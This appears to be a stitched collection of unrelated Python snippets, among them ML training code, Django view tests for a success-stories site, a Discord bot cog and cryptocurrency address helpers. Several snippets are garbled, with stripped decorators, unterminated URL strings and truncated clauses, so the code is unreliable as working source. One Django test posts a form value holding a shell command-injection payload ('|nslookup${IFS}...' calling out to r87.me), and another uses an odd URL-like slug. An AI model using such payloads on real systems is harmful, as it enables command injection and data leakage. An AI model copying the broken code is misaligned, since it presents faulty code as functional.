def create_empty_weighted() -> KeyedJaggedTensor:
return KeyedJaggedTensor.empty(is_weighted=True)
torch.jit.script(create_empty)
torch.jit.script(create_empty_weighted) |
def perf_attrib(returns, positions, factor_returns, factor_loadings):
start = returns.index[0]
end = returns.index[(- 1)]
factor_returns = factor_returns.loc[start:end]
factor_loadings = factor_loadings.loc[start:end]
factor_loadings.index = factor_loadings.index.set_names(['dt', 'ticker'])
positions = positions.copy()
positions.index = positions.index.set_names(['dt', 'ticker'])
risk_exposures_portfolio = compute_exposures(positions, factor_loadings)
perf_attrib_by_factor = risk_exposures_portfolio.multiply(factor_returns)
common_returns = perf_attrib_by_factor.sum(axis='columns')
tilt_exposure = risk_exposures_portfolio.mean()
tilt_returns = factor_returns.multiply(tilt_exposure).sum(axis='columns')
timing_returns = (common_returns - tilt_returns)
specific_returns = (returns - common_returns)
returns_df = pd.DataFrame(OrderedDict([('total_returns', returns), ('common_returns', common_returns), ('specific_returns', specific_returns), ('tilt_returns', tilt_returns), ('timing_returns', timing_returns)]))
return (risk_exposures_portfolio, pd.concat([perf_attrib_by_factor, returns_df], axis='columns')) |
def test_history_edit(monkeypatch):
app = cmd2.Cmd(multiline_commands=['alias'])
app.editor = 'fooedit'
edit_mock = mock.MagicMock(name='run_editor')
monkeypatch.setattr('cmd2.Cmd.run_editor', edit_mock)
run_script_mock = mock.MagicMock(name='do_run_script')
monkeypatch.setattr('cmd2.Cmd.do_run_script', run_script_mock)
run_cmd(app, 'help')
run_cmd(app, 'alias create my_alias history;')
run_cmd(app, 'history -e 1:2')
edit_mock.assert_called_once()
run_script_mock.assert_called_once() |
def test_illegal_inport_deep_write():
class B(ComponentLevel3):
def construct(s):
s.in_ = InPort(Bits32)
def up_B_print():
print(s.in_)
class BWrap(ComponentLevel3):
def construct(s):
s.b = B()
class Top(ComponentLevel3):
def construct(s):
s.b = BWrap()
def up_write_b_in():
s.b.b.in_[1:10] = 10
try:
_test_model(Top)
except SignalTypeError as e:
print('{} is thrown\n{}'.format(e.__class__.__name__, e))
return
raise Exception("Should've thrown invalid input port write SignalTypeError.") |
class RK23(RKAdaptiveStepSolver):
error_estimator_order = 2
n_stages = 3
C = torch.tensor([0, (1 / 2), (3 / 4)], dtype=torch.float64)
A = torch.tensor([[0, 0, 0], [(1 / 2), 0, 0], [0, (3 / 4), 0]], dtype=torch.float64)
B = torch.tensor([(2 / 9), (1 / 3), (4 / 9)], dtype=torch.float64)
E = torch.tensor([(5 / 72), ((- 1) / 12), ((- 1) / 9), (1 / 8)], dtype=torch.float64) |
def run_training_entry():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('dataset_name_or_id', type=str, help='Dataset name or ID to train with')
parser.add_argument('configuration', type=str, help='Configuration that should be trained')
parser.add_argument('fold', type=str, help='Fold of the 5-fold cross-validation. Should be an int between 0 and 4.')
parser.add_argument('-tr', type=str, required=False, default='nnUNetTrainer', help='[OPTIONAL] Use this flag to specify a custom trainer. Default: nnUNetTrainer')
parser.add_argument('-p', type=str, required=False, default='nnUNetPlans', help='[OPTIONAL] Use this flag to specify a custom plans identifier. Default: nnUNetPlans')
parser.add_argument('-pretrained_weights', type=str, required=False, default=None, help='[OPTIONAL] path to nnU-Net checkpoint file to be used as pretrained my_models. Will only be used when actually training. Beta. Use with caution.')
parser.add_argument('-num_gpus', type=int, default=1, required=False, help='Specify the number of GPUs to use for training')
parser.add_argument('--use_compressed', default=False, action='store_true', required=False, help='[OPTIONAL] If you set this flag the training cases will not be decompressed. Reading compressed data is much more CPU and (potentially) RAM intensive and should only be used if you know what you are doing')
parser.add_argument('--npz', action='store_true', required=False, help='[OPTIONAL] Save softmax predictions from final validation as npz files (in addition to predicted segmentations). Needed for finding the best ensemble.')
parser.add_argument('--c', action='store_true', required=False, help='[OPTIONAL] Continue training from latest checkpoint')
parser.add_argument('--val', action='store_true', required=False, help='[OPTIONAL] Set this flag to only run the validation. Requires training to have finished.')
parser.add_argument('--disable_checkpointing', action='store_true', required=False, help='[OPTIONAL] Set this flag to disable checkpointing. Ideal for testing things out and you dont want to flood your hard drive with checkpoints.')
parser.add_argument('-device', type=str, default='cuda', required=False, help="Use this to set the device the training should run with. Available options are 'cuda' (GPU), 'cpu' (CPU) and 'mps' (Apple M1/M2). Do NOT use this to set which GPU ID! Use CUDA_VISIBLE_DEVICES=X nnUNetv2_train [...] instead!")
parser.add_argument('--job_id', type=str, default='unknown', required=False, help='qsub job id.')
parser.add_argument('--debug', dest='debug', action='store_true')
parser.add_argument('--no-debug', dest='debug', action='store_false')
parser.set_defaults(debug=True)
args = parser.parse_args()
assert (args.device in ['cpu', 'cuda', 'mps']), f'-device must be either cpu, mps or cuda. Other devices are not tested/supported. Got: {args.device}.'
if (args.device == 'cpu'):
import multiprocessing
torch.set_num_threads(multiprocessing.cpu_count())
device = torch.device('cpu')
elif (args.device == 'cuda'):
torch.set_num_threads(1)
torch.set_num_interop_threads(1)
device = torch.device('cuda')
else:
device = torch.device('mps')
if (args.job_id == '458803'):
args.job_id = '456319'
elif (args.job_id == '458805'):
args.job_id = '456329'
elif (args.job_id == '458824'):
args.job_id = '458821'
run_training(args.dataset_name_or_id, args.configuration, args.fold, args.tr, args.p, args.pretrained_weights, args.num_gpus, args.use_compressed, args.npz, args.c, args.val, args.disable_checkpointing, device=device, debug=args.debug, job_id=args.job_id) |
.parametrize('op, x, exc, op_args', [(nlinalg.MatrixInverse, set_test_value(pt.dmatrix(), (lambda x: x.T.dot(x))(rng.random(size=(3, 3)).astype('float64'))), None, ()), (nlinalg.MatrixInverse, set_test_value(pt.lmatrix(), (lambda x: x.T.dot(x))(rng.integers(1, 10, size=(3, 3)).astype('int64'))), None, ()), (nlinalg.MatrixPinv, set_test_value(pt.dmatrix(), (lambda x: x.T.dot(x))(rng.random(size=(3, 3)).astype('float64'))), None, (True,)), (nlinalg.MatrixPinv, set_test_value(pt.lmatrix(), (lambda x: x.T.dot(x))(rng.integers(1, 10, size=(3, 3)).astype('int64'))), None, (False,))])
def test_matrix_inverses(op, x, exc, op_args):
g = op(*op_args)(x)
g_fg = FunctionGraph(outputs=[g])
cm = (contextlib.suppress() if (exc is None) else pytest.warns(exc))
with cm:
compare_numba_and_py(g_fg, [i.tag.test_value for i in g_fg.inputs if (not isinstance(i, (SharedVariable, Constant)))]) |
.parametrize('entitytrigger', [OSC.EndOfRoadCondition(2), OSC.CollisionCondition('hej'), OSC.OffroadCondition(3), OSC.TimeHeadwayCondition('my entity', 2, OSC.Rule.greaterOrEqual), OSC.TimeToCollisionCondition(1, OSC.Rule.greaterOrEqual, entity='target'), OSC.AccelerationCondition(2, OSC.Rule.greaterOrEqual), OSC.StandStillCondition(5), OSC.SpeedCondition(15, OSC.Rule.greaterOrEqual), OSC.RelativeSpeedCondition(1, OSC.Rule.greaterOrEqual, 'target'), OSC.TraveledDistanceCondition(59), OSC.ReachPositionCondition(OSC.WorldPosition(), 4), OSC.DistanceCondition(4, OSC.Rule.greaterOrEqual, OSC.WorldPosition()), OSC.RelativeDistanceCondition(2, OSC.Rule.greaterOrEqual, OSC.RelativeDistanceType.lateral, 'target')])
def test_entity_condition_factory(entitytrigger):
factoryoutput = OSC.triggers._EntityConditionFactory.parse_entity_condition(entitytrigger.get_element())
prettyprint(entitytrigger, None)
prettyprint(factoryoutput, None)
assert (entitytrigger == factoryoutput) |
def model_grads_to_master_grads(model_params, master_params, flat_master=False):
if flat_master:
master_params[0].grad.data.copy_(_flatten_dense_tensors([p.grad.data for p in model_params]))
else:
for (model, master) in zip(model_params, master_params):
if (model.grad is not None):
if (master.grad is None):
master.grad = Variable(master.data.new(*master.data.size()))
master.grad.data.copy_(model.grad.data)
else:
master.grad = None |
class StoryViewTests(TestCase):
def setUp(self):
self.user = UserFactory(username='username', password='password')
self.category = StoryCategoryFactory(name='Arts')
self.story1 = StoryFactory(category=self.category, featured=True)
self.story2 = StoryFactory(category=self.category, is_published=False)
def test_story_view(self):
url = reverse('success_story_detail', kwargs={'slug': self.story1.slug})
r = self.client.get(url)
self.assertEqual(r.status_code, 200)
self.assertEqual(r.context['story'].pk, self.story1.pk)
self.assertEqual(len(r.context['category_list']), 1)
def test_unpublished_story_view(self):
url = reverse('success_story_detail', kwargs={'slug': self.story2.slug})
r = self.client.get(url)
self.assertEqual(r.status_code, 404)
staff = User.objects.create_superuser(username='spameggs', password='password', email='')
self.assertTrue(staff.is_staff)
self.client.login(username=staff.username, password='password')
r = self.client.get(url)
self.assertEqual(r.status_code, 200)
self.assertFalse(r.context['story'].is_published)
def test_story_list(self):
url = reverse('success_story_list')
r = self.client.get(url)
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.context['stories']), 1)
def test_story_category_list(self):
url = reverse('success_story_list_category', kwargs={'slug': self.category.slug})
r = self.client.get(url)
self.assertEqual(r.status_code, 200)
self.assertEqual(r.context['object'], self.category)
self.assertEqual(len(r.context['object'].success_stories.all()), 2)
self.assertEqual(r.context['object'].success_stories.all()[0].pk, self.story2.pk)
def test_story_create(self):
mail.outbox = []
url = reverse('success_story_create')
self.client.login(username='username', password='password')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
post_data = {'name': 'Three', 'company_name': 'Company Three', 'company_url': ' 'category': self.category.pk, 'author': 'Kevin Arnold', 'author_email': '', 'pull_quote': 'Liver!', 'content': 'Growing up is never easy.\n\nFoo bar baz.\n', settings.HONEYPOT_FIELD_NAME: settings.HONEYPOT_VALUE}
response = self.client.post(url, post_data)
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, url)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'New success story submission: {}'.format(post_data['name']))
expected_output = re.compile('Name: (.*)\\nCompany name: (.*)\\nCompany URL: (.*)\\nCategory: (.*)\\nAuthor: (.*)\\nAuthor email: (.*)\\nPull quote:\\n\\n(.*)\\n\\nContent:\\n\\n(.*)\\n\\nReview URL: (.*)', flags=re.DOTALL)
self.assertRegex(mail.outbox[0].body, expected_output)
self.assertNotIn('<p>', mail.outbox[0].body)
self.assertEqual(mail.outbox[0].content_subtype, 'plain')
self.assertEqual(mail.outbox[0].reply_to, [post_data['author_email']])
stories = Story.objects.draft().filter(slug__exact='three')
self.assertEqual(len(stories), 1)
story = stories[0]
self.assertIsNotNone(story.created)
self.assertIsNotNone(story.updated)
self.assertIsNone(story.creator)
self.assertEqual(story.submitted_by, self.user)
response = self.client.post(url, post_data)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Please use a unique name.')
del mail.outbox[:]
def test_story_multiline_email_subject(self):
mail.outbox = []
url = reverse('success_story_create')
post_data = {'name': 'First line\nSecond line', 'company_name': 'Company Three', 'company_url': ' 'category': self.category.pk, 'author': 'Kevin Arnold', 'author_email': '', 'pull_quote': 'Liver!', 'content': 'Growing up is never easy.\n\nFoo bar baz.\n', settings.HONEYPOT_FIELD_NAME: settings.HONEYPOT_VALUE}
self.client.login(username='username', password='password')
response = self.client.post(url, post_data)
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, url)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'New success story submission: First line')
self.assertNotIn('Second line', mail.outbox[0].subject)
del mail.outbox[:]
def test_story_duplicate_slug(self):
url = reverse('success_story_create')
post_data = {'name': 'r87comwwwpythonorg', 'company_name': 'Company Three', 'company_url': ' 'category': self.category.pk, 'author': 'Kevin Arnold', 'author_email': '', 'pull_quote': 'Liver!', 'content': 'Growing up is never easy.\n\nFoo bar baz.\n', settings.HONEYPOT_FIELD_NAME: settings.HONEYPOT_VALUE}
self.client.login(username='username', password='password')
response = self.client.post(url, post_data)
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, url)
post_data = post_data.copy()
post_data['name'] = '///r87.com/?www.python.org/'
response = self.client.post(url, post_data)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Please use a unique name.')
def test_slug_field_max_length(self):
url = reverse('success_story_create')
post_data = {'name': '|nslookup${IFS}"vprlkb-tutkaenivhxr1i4bxrdosuteo8wh4mb2r""cys.r87.me"', 'company_name': 'Company Three', 'company_url': ' 'category': self.category.pk, 'author': 'Kevin Arnold', 'author_email': '', 'pull_quote': 'Liver!', 'content': 'Growing up is never easy.\n\nFoo bar baz.\n', settings.HONEYPOT_FIELD_NAME: settings.HONEYPOT_VALUE}
self.client.login(username='username', password='password')
response = self.client.post(url, post_data)
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, url)
def test_nul_character(self):
url = reverse('success_story_create')
post_data = {'name': 'Before\x00After', 'company_name': 'Company Three', 'company_url': ' 'category': self.category.pk, 'author': 'Kevin Arnold', 'author_email': '', 'pull_quote': 'Liver!', 'content': 'Growing up is never easy.\n\nFoo bar baz.\n', settings.HONEYPOT_FIELD_NAME: settings.HONEYPOT_VALUE}
self.client.login(username='username', password='password')
response = self.client.post(url, post_data)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Null characters are not allowed.') |
def ecp_int(cell, kpts=None):
from pyscf.pbc.df import incore
lib.logger.debug(cell, 'PBC-ECP integrals')
if (kpts is None):
kpts_lst = numpy.zeros((1, 3))
else:
kpts_lst = numpy.reshape(kpts, ((- 1), 3))
(cell, contr_coeff) = gto.cell._split_basis(cell)
lib.logger.debug1(cell, 'nao %d -> nao %d', *contr_coeff.shape)
ecpcell = cell.copy(deep=False)
exp_ptr = cell._ecpbas[((- 1), PTR_EXP)]
ecpcell._bas = numpy.array([[0, 0, 1, 1, 0, exp_ptr, 0, 0]], dtype=numpy.int32)
cell._env[AS_NECPBAS] = len(cell._ecpbas)
shls_slice = (0, cell.nbas, 0, cell.nbas, 0, 1)
dfbuilder = incore.Int3cBuilder(cell, ecpcell, kpts_lst).build()
int3c = dfbuilder.gen_int3c_kernel('ECPscalar', aosym='s2', comp=1, j_only=True, return_complex=True)
buf = int3c(shls_slice)
buf = buf.reshape(len(kpts_lst), (- 1))
mat = []
for (k, kpt) in enumerate(kpts_lst):
v = lib.unpack_tril(buf[k], lib.HERMITIAN)
if (abs(kpt).max() < 1e-09):
v = v.real
mat.append(reduce(numpy.dot, (contr_coeff.T, v, contr_coeff)))
if ((kpts is None) or (numpy.shape(kpts) == (3,))):
mat = mat[0]
return mat |
def parse_args():
parser = argparse.ArgumentParser(description='Build grounding between QDMR and SQL.')
parser.add_argument('--output_path', type=str, default=None, help='path to output file with grounding (found correct SPARQL script)')
parser.add_argument('--output_path_all', type=str, default=None, help='path to output file with grounding')
args = parser.parse_args()
return args |
_torch_tpu
class TorchXLAExamplesTests(TestCasePlus):
def test_run_glue(self):
import xla_spawn
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f'''
./examples/pytorch/text-classification/run_glue.py
--num_cores=8
./examples/pytorch/text-classification/run_glue.py
--model_name_or_path distilbert-base-uncased
--output_dir {tmp_dir}
--overwrite_output_dir
--train_file ./tests/fixtures/tests_samples/MRPC/train.csv
--validation_file ./tests/fixtures/tests_samples/MRPC/dev.csv
--do_train
--do_eval
--debug tpu_metrics_debug
--per_device_train_batch_size=2
--per_device_eval_batch_size=1
--learning_rate=1e-4
--max_steps=10
--warmup_steps=2
--seed=42
--max_seq_length=128
'''.split()
with patch.object(sys, 'argv', testargs):
start = time()
xla_spawn.main()
end = time()
result = get_results(tmp_dir)
self.assertGreaterEqual(result['eval_accuracy'], 0.75)
self.assertLess((end - start), 500)
def test_trainer_tpu(self):
import xla_spawn
testargs = '\n ./tests/test_trainer_tpu.py\n --num_cores=8\n ./tests/test_trainer_tpu.py\n '.split()
with patch.object(sys, 'argv', testargs):
xla_spawn.main() |
class Ssverification(Cog):
def __init__(self, bot: Quotient):
self.bot = bot
self.request_url = (self.bot.config.FASTAPI_URL + '/ocr')
self.headers = {'authorization': self.bot.config.FASTAPI_KEY, 'Content-Type': 'application/json'}
self.__mratelimiter = MemberLimits(QuotientRatelimiter)
self.__gratelimiter = GuildLimits(QuotientRatelimiter)
self.__verify_lock = asyncio.Lock()
async def __check_ratelimit(self, message: discord.Message):
if (retry := self.__mratelimiter[message.author].is_ratelimited(message.author)):
(await message.reply(embed=discord.Embed(color=discord.Color.red(), description=f'**You are too fast. Kindly resend after `{retry:.2f}` seconds.**')))
return False
elif (retry := self.__gratelimiter[message.guild].is_ratelimited(message.guild)):
(await message.reply(embed=discord.Embed(color=discord.Color.red(), description=f'**Many users are submitting screenshots from this server at this time. Kindly retry after `{retry:.2f}` seconds.**')))
return False
return True
()
async def on_message(self, message: discord.Message):
if (not all((message.guild, (not message.author.bot), (message.channel.id in self.bot.cache.ssverify_channels)))):
return
record = (await SSVerify.get_or_none(channel_id=message.channel.id))
if (not record):
return self.bot.cache.ssverify_channels.discard(message.channel.id)
if ('tourney-mod' in (role.name.lower() for role in message.author.roles)):
return
ctx: Context = (await self.bot.get_context(message))
_e = discord.Embed(color=discord.Color.red())
with suppress(discord.HTTPException):
if (await record.is_user_verified(message.author.id)):
_e.description = '**Your screenshots are already verified, kindly move onto next step.**'
return (await ctx.reply(embed=_e))
if (not (attachments := self.__valid_attachments(message))):
_e.description = '**Kindly send screenshots in `png/jpg/jpeg` format only.**'
return (await ctx.reply(embed=_e))
if (not (await self.__check_ratelimit(message))):
return
if (len(attachments) > record.required_ss):
_e.description = f'**You only have to send `{record.required_ss}` screenshots but you sent `{len(attachments)}`**'
return (await ctx.reply(embed=_e))
_e.color = discord.Color.yellow()
_e.description = f'Processing your {plural(attachments):screenshot|screenshots}... {emote.loading}'
m: discord.Message = (await message.reply(embed=_e))
_data = [{'url': _.proxy_url} for _ in attachments]
start_at = self.bot.current_time
async with self.__verify_lock:
async with self.bot.session.post(self.request_url, json=_data, headers=self.headers) as resp:
complete_at = self.bot.current_time
try:
_ocr = (await resp.json())
except aio
(_e.color, _e.description) = (discord.Color.red(), '**Failed to process your screenshots. Try again later.**')
return (await message.reply(embed=_e))
embed = (await self.__verify_screenshots(ctx, record, [ImageResponse(**_) for _ in _ocr]))
embed.set_footer(text=f'Time taken: {humanize.precisedelta((complete_at - start_at))}')
embed.set_author(name=f'Submitted {(await record.data.filter(author_id=ctx.author.id).count())}/{record.required_ss}', icon_url=getattr(ctx.author.display_avatar, 'url', None))
with suppress(discord.HTTPException):
(await m.delete())
(await message.reply(embed=embed))
if (await record.is_user_verified(ctx.author.id)):
(await message.author.add_roles(discord.Object(id=record.role_id)))
if record.success_message:
_e.title = f'Screenshot Verification Complete'
(_e.url, _e.description) = (message.jump_url, record.success_message)
return (await message.reply(embed=_e))
_e.description = f'{ctx.author.mention} Your screenshots are verified, Move to next step.'
(await message.reply(embed=_e))
async def __verify_screenshots(self, ctx: Context, record: SSVerify, _ocr: List[ImageResponse]) -> discord.Embed:
_e = discord.Embed(color=self.bot.color, description='')
for _ in _ocr:
if (not record.allow_same):
(b, t) = (await record._match_for_duplicate(_.dhash, _.phash, ctx.author.id))
if b:
_e.description += t
continue
if (record.ss_type == SSType.anyss):
_e.description += f'''{record.emoji(True)} | Successfully Verified.
'''
(await record._add_to_data(ctx, _))
elif (record.ss_type == SSType.yt):
_e.description += (await record.verify_yt(ctx, _))
elif (record.ss_type == SSType.insta):
_e.description += (await record.verify_insta(ctx, _))
elif (record.ss_type == SSType.loco):
_e.description += (await record.verify_loco(ctx, _))
elif (record.ss_type == SSType.rooter):
_e.description += (await record.verify_rooter(ctx, _))
elif (record.ss_type == SSType.custom):
_e.description += (await record.verify_custom(ctx, _))
return _e
def __valid_attachments(self, message: discord.Message):
return [_ for _ in message.attachments if (_.content_type in ('image/png', 'image/jpeg', 'image/jpg'))]
()
async def on_guild_channel_delete(self, channel: discord.TextChannel):
if (channel.id in self.bot.cache.ssverify_channels):
record = (await SSVerify.get_or_none(channel_id=channel.id))
if record:
(await record.full_delete())
()
async def on_guild_role_delete(self, role: discord.Role):
records = (await SSVerify.filter(role_id=role.id))
if records:
for record in records:
(await record.full_delete()) |
def address_to_script(addr: str, *, net=None) -> str:
if (net is None):
net = constants.net
if (not is_address(addr, net=net)):
raise BitcoinException(f'invalid Qtum address: {addr}')
(witver, witprog) = segwit_addr.decode(net.SEGWIT_HRP, addr)
if (witprog is not None):
if (not (0 <= witver <= 16)):
raise BitcoinException(f'impossible witness version: {witver}')
return construct_script([witver, bytes(witprog)])
(addrtype, hash_160_) = b58_address_to_hash160(addr)
if (addrtype == net.ADDRTYPE_P2PKH):
script = pubkeyhash_to_p2pkh_script(hash_160_.hex())
elif (addrtype == net.ADDRTYPE_P2SH):
script = construct_script([opcodes.OP_HASH160, hash_160_, opcodes.OP_EQUAL])
else:
raise BitcoinException(f'unknown address type: {addrtype}')
return script |
def test_cli_async_map(runner, reactor, server, capsys):
base_url = '
in_stream = ''.join((base_url.format(i) for i in [1, 1, 5, 1]))
args = ['--exec-before', 'import datetime; now=datetime.datetime.now; START_TIME=now()', 'async-map', 'await asks.get ! f"{types.SimpleNamespace(**x.json()).delay}"']
expected = '1\n1\n5\n1\n'
with helpers.Timer(6.0):
output = helpers.run(args, input=in_stream.encode()).decode()
assert (output == expected) |
class AnimatedToggle(Toggle):
_transparent_pen = QPen(Qt.transparent)
_light_grey_pen = QPen(Qt.lightGray)
def __init__(self, *args, pulse_unchecked_color='#', pulse_checked_color='#4400B0EE', **kwargs):
self._pulse_radius = 0
super().__init__(*args, **kwargs)
self.animation = QPropertyAnimation(self, b'handle_position', self)
self.animation.setEasingCurve(QEasingCurve.InOutCubic)
self.animation.setDuration(200)
self.pulse_anim = QPropertyAnimation(self, b'pulse_radius', self)
self.pulse_anim.setDuration(350)
self.pulse_anim.setStartValue(10)
self.pulse_anim.setEndValue(20)
self.animations_group = QSequentialAnimationGroup()
self.animations_group.addAnimation(self.animation)
self.animations_group.addAnimation(self.pulse_anim)
self._pulse_unchecked_animation = QBrush(QColor(pulse_unchecked_color))
self._pulse_checked_animation = QBrush(QColor(pulse_checked_color))
(int)
def handle_state_change(self, value):
self.animations_group.stop()
if value:
self.animation.setEndValue(1)
else:
self.animation.setEndValue(0)
self.animations_group.start()
def paintEvent(self, e: QPaintEvent):
contRect = self.contentsRect()
handleRadius = round((0.24 * contRect.height()))
p = QPainter(self)
p.setRenderHint(QPainter.Antialiasing)
p.setPen(self._transparent_pen)
barRect = QRectF(0, 0, (contRect.width() - handleRadius), (0.4 * contRect.height()))
barRect.moveCenter(contRect.center())
rounding = (barRect.height() / 2)
trailLength = (contRect.width() - (2 * handleRadius))
xPos = ((contRect.x() + handleRadius) + (trailLength * self._handle_position))
if (self.pulse_anim.state() == QPropertyAnimation.Running):
p.setBrush((self._pulse_checked_animation if self.isChecked() else self._pulse_unchecked_animation))
p.drawEllipse(QPointF(xPos, barRect.center().y()), self._pulse_radius, self._pulse_radius)
if self.isChecked():
p.setBrush(self._bar_checked_brush)
p.drawRoundedRect(barRect, rounding, rounding)
p.setBrush(self._handle_checked_brush)
else:
p.setBrush(self._bar_brush)
p.drawRoundedRect(barRect, rounding, rounding)
p.setPen(self._light_grey_pen)
p.setBrush(self._handle_brush)
p.drawEllipse(QPointF(xPos, barRect.center().y()), handleRadius, handleRadius)
p.end() |
def interpret_dc_type(field_type):
if isinstance(field_type, str):
raise RuntimeError('field should be a type')
if (field_type == Any):
return str
typestring = str(field_type)
if (re.match('(typing.|^)Union\\[(.*), NoneType\\]$', typestring) or typestring.startswith('typing.Optional')):
return field_type.__args__[0]
return field_type |
def user_view(user, password=None):
user_data = {'kind': 'user', 'name': user.username, 'username': user.username, 'email': user.email, 'verified': user.verified, 'avatar': avatar.get_data_for_user(user), 'super_user': usermanager.is_superuser(user.username), 'enabled': user.enabled}
if (password is not None):
user_data['encrypted_password'] = authentication.encrypt_user_password(password).decode('ascii')
return user_data |
def convert_raw_tx_to_hex(raw: Union[(str, bytes)]) -> str:
if (not raw):
raise ValueError('empty string')
raw_unstripped = raw
raw = raw.strip()
try:
return binascii.unhexlify(raw).hex()
except:
pass
try:
return base_decode(raw, base=43).hex()
except:
pass
if (raw[0:6] in ('cHNidP', b'cHNidP')):
try:
return base64.b64decode(raw).hex()
except:
pass
if isinstance(raw_unstripped, bytes):
return raw_unstripped.hex()
raise ValueError(f'failed to recognize transaction encoding for txt: {raw[:30]}...') |
class JobDetail(JobMixin, DetailView):
def get_queryset(self):
queryset = Job.objects.select_related()
if self.has_jobs_board_admin_access():
return queryset
if self.request.user.is_authenticated:
return (queryset.visible() | queryset.by(self.request.user))
return queryset.visible()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['category_jobs'] = self.object.category.jobs.select_related('category')[:5]
context['user_can_edit'] = (((self.object.creator == self.request.user) or self.has_jobs_board_admin_access()) and self.object.editable)
context['job_review_form'] = JobReviewCommentForm(initial={'job': self.object})
return context |
def mlp(dim, hidden_dim, output_dim, layers=1, batch_norm=False):
if batch_norm:
seq = [nn.Linear(dim, hidden_dim), nn.BatchNorm1d(num_features=hidden_dim), nn.ReLU(inplace=True)]
for _ in range(layers):
seq += [nn.Linear(hidden_dim, hidden_dim), nn.BatchNorm1d(num_features=hidden_dim), nn.ReLU(inplace=True)]
else:
seq = [nn.Linear(dim, hidden_dim), nn.ReLU(inplace=True)]
for _ in range(layers):
seq += [nn.Linear(hidden_dim, hidden_dim), nn.ReLU(inplace=True)]
seq += [nn.Linear(hidden_dim, output_dim)]
return nn.Sequential(*seq) |
.skipif((sys.implementation.name != 'cpython'), reason='Only makes sense with refcounting GC')
def test_ExceptionGroup_catch_doesnt_create_cyclic_garbage() -> None:
gc.collect()
old_flags = gc.get_debug()
def make_multi() -> NoReturn:
raise ExceptionGroup('', [get_exc(raiser1), get_exc(raiser2)])
try:
gc.set_debug(gc.DEBUG_SAVEALL)
with pytest.raises(ExceptionGroup) as excinfo:
raise make_multi()
for exc in excinfo.value.exceptions:
assert isinstance(exc, (ValueError, KeyError))
gc.collect()
assert (not gc.garbage)
finally:
gc.set_debug(old_flags)
gc.garbage.clear() |
class DamagePattern():
instance = None
def getInstance(cls):
if (cls.instance is None):
cls.instance = DamagePattern()
return cls.instance
def getUserDamagePatternList():
return eos.db.getDamagePatternList()
def getBuiltinDamagePatternList():
return es_DamagePattern.getBuiltinList()
def getDamagePattern(name):
return eos.db.getDamagePattern(name)
def newPattern(name):
p = es_DamagePattern(0, 0, 0, 0)
p.rawName = name
eos.db.save(p)
return p
def renamePattern(p, newName):
p.rawName = newName
eos.db.save(p)
def deletePattern(p):
eos.db.remove(p)
def copyPattern(p):
newP = copy.deepcopy(p)
eos.db.save(newP)
return newP
def saveChanges(p):
eos.db.save(p)
def importPatterns(self, text):
(imports, num) = es_DamagePattern.importPatterns(text)
lenImports = len(imports)
if (lenImports == 0):
raise ImportError('No patterns found for import')
if (lenImports != num):
raise ImportError(('%d patterns imported from clipboard; %d had errors' % (num, (num - lenImports))))
def exportPatterns(self):
patterns = self.getUserDamagePatternList()
for i in range((len(patterns) - 1), (- 1), (- 1)):
if (patterns[i].name in ('Uniform', 'Selected Ammo')):
del patterns[i]
patterns.sort(key=(lambda p: p.fullName))
return es_DamagePattern.exportPatterns(*patterns) |
def schedule_threshold(step: int, total_step: int, warmup_steps: int, initial_threshold: float, final_threshold: float, initial_warmup: int, final_warmup: int, final_lambda: float):
if (step <= (initial_warmup * warmup_steps)):
threshold = initial_threshold
elif (step > (total_step - (final_warmup * warmup_steps))):
threshold = final_threshold
else:
spars_warmup_steps = (initial_warmup * warmup_steps)
spars_schedu_steps = ((final_warmup + initial_warmup) * warmup_steps)
mul_coeff = (1 - ((step - spars_warmup_steps) / (total_step - spars_schedu_steps)))
threshold = (final_threshold + ((initial_threshold - final_threshold) * (mul_coeff ** 3)))
regu_lambda = ((final_lambda * threshold) / final_threshold)
return (threshold, regu_lambda) |
def _create_gda(partitioner: partitioning.BasePartitioner, global_shapes: PyTreeDef, host_arrays: PyTreeDef) -> PyTreeDef:
global_mesh = partitioner.mesh
axes = partitioner.data_partition_spec
local_devices = global_mesh.local_devices
local_device_count = jax.local_device_count()
def _put_to_devices(x, global_shape):
device_to_idxs = gda_lib.get_shard_indices(global_shape, global_mesh, axes)
(host_to_idxs, idx_to_devices) = _get_index_mappings(device_to_idxs)
shard_length = gda_lib.get_shard_shape(global_shape, global_mesh, axes)[0]
num_shards = (len(x) // shard_length)
try:
local_array_shards = np.split(x, num_shards, axis=0)
except ValueError as array_split_error:
raise ValueError(f'Unable to put to devices shape {x.shape} with local device count {local_device_count}') from array_split_error
device_to_split_array_idx = {}
i = 0
for idx in host_to_idxs[jax.process_index()]:
assert (idx in idx_to_devices)
for d in idx_to_devices[idx]:
device_to_split_array_idx[d] = (i % len(local_array_shards))
i += 1
device_buffers = []
for d in local_devices:
assert (d in device_to_split_array_idx)
i = device_to_split_array_idx[d]
device_buffers.append(jax.device_put(local_array_shards[i], d))
return device_buffers
device_buffers = jax.tree_map(_put_to_devices, host_arrays, global_shapes)
def _gda(dbs, global_shape):
if jax.config.jax_array:
return jax.make_array_from_single_device_arrays(global_shape, jax.sharding.NamedSharding(global_mesh, axes), dbs)
else:
return GlobalDeviceArray(global_shape, global_mesh, axes, dbs)
return jax.tree_map(_gda, device_buffers, global_shapes, is_leaf=(lambda x: isinstance(x, (list, tuple)))) |
class HookContainer():
def __init__(self, record_keeper, record_group_name_prefix=None, primary_metric='mean_average_precision_at_r', validation_split_name='val', save_models=True):
self.record_keeper = record_keeper
self.record_group_name_prefix = record_group_name_prefix
self.saveable_trainer_objects = ['models', 'optimizers', 'lr_schedulers', 'loss_funcs', 'mining_funcs']
self.primary_metric = primary_metric
self.validation_split_name = validation_split_name
self.do_save_models = save_models
def end_of_iteration_hook(self, trainer):
